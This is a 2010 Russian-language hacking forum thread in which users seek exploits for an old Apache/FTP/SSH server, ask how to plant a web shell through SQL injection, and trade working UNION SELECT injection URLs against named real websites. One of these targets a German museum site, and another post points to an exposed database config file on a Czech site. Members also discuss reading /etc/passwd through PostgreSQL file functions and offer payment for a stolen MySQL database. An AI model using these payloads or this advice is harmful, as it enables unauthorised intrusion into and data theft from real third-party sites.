13.06.2010, 20:12
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами:
8984365
Репутация:
45
|
|
Apache/1.3.27 (Unix) (Red-Hat/Linux) FrontPage/5.0.2.2626 mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.3.11 mod_perl/1.27 - вот такая система есть у меня. Апач довольно старый, подозреваю, что есть сплойты под него. Только найти не могу.
фтп - Version wu-2.6.2(1)
ssh - SSH-1.99-OpenSSH_3.1p1
подкиньте идейку или рабочий сплойт. В идеале мне нужна MySQL база, но мскл инъекций на сайте не обнаружено. Если достану базу - отблагодарю
|
|
|
13.06.2010, 20:37
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 10
С нами:
8421163
Репутация:
0
|
|
подскажите пожалуйста как залить шелл.
ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).
по крайней мере пытался, но пишет:
Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)
Последний раз редактировалось exT1ma4ka; 13.06.2010 в 20:42..
|
|
|
|
15.06.2010, 13:41
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 10
С нами:
8421163
Репутация:
0
|
|
Сообщение от exT1ma4ka
подскажите пожалуйста как залить шелл.
ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).
по крайней мере пытался, но пишет:
Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)
актуально )
|
|
|
|
15.06.2010, 13:43
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от exT1ma4ka
актуально )
залей шелл в папку /tmp , и ищи инклуд на сайте
|
|
|
|
14.06.2010, 13:25
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами:
9534473
Репутация:
18
|
|
помогите расскрутить это
http://www.hausderkunst.de/hdk.de/index.php?StoryID=-999999
|
|
|
|
14.06.2010, 13:50
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от GOGA075
помогите расскрутить это
http://www.hausderkunst.de/hdk.de/index.php?StoryID=-999999
http://www.hausderkunst.de/hdk.de/index.php?StoryID=-2+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+1,1--
Перебирай limit'ом
|
|
|
|
14.06.2010, 13:49
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
ребят вот такой вопрос :
имеется сервер Microsoft-IIS/7.0, язык asp
База : PostgreSQL
через функции Postgre хотел читать файл C:\boot.ini,файл не открылся..(strange strange strange)
просто из за интереса попробовал читать файл /etc/passwd (ну я знаю что в винде такого нету)
и файл открылся!!
как это понять?
реально ли использовать IIS под никcом??
|
|
|
|
14.06.2010, 15:32
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Konqi
ребят вот такой вопрос :
имеется сервер Microsoft-IIS/7.0, язык asp
База : PostgreSQL
через функции Postgre хотел читать файл C:\boot.ini,файл не открылся..(strange strange strange)
просто из за интереса попробовал читать файл /etc/passwd (ну я знаю что в винде такого нету)
и файл открылся!!
как это понять?
реально ли использовать IIS под никcом??
Ты сам себе ответил.
Сообщение от FlaktW
Фильтруется select, как обойти?
http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
http://www.albumband.cz/mysql.cfg
 Давно такого не видел 
Последний раз редактировалось Ctacok; 14.06.2010 в 15:45..
|
|
|
|
14.06.2010, 17:00
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Ctacok что предлагаешь? можно как-нибудь узнать путь до сайта?
|
|
|
|
14.06.2010, 17:48
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Konqi
Ctacok что предлагаешь? можно как-нибудь узнать путь до сайта?
Дак там же ошибка есть, /web/htdocs/albumbandcz/www/pisen.php
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
